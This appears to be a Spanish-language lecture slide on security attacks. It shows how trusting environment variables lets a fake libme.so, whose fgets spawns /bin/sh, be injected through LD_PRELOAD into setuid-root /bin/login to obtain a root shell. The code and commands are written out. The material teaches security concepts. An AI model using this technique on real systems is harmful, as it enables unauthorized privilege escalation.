Ejemplos de ataques

• Confiar en las variables de entorno

  • Tomamos un programa setuid para root y que use librerías dinámicas (por ejempló /bin/login, carga dinámicamente la función fgets para recoger el usuario)
  • Creamos la librería libme.so en el directorio actual nueva redefiniéndola:
    • fgets(char *buf, int n, FILE *fp)
    • {
      • execl("/bin/sh", "-sh", 0);
    • }
• Si ejecutamos
• % LD_PRELOAD=.:$LD_PRELOAD
• % /bin/login
• #
• Tendríamos un shell con privilegios de su propietario.

Notas: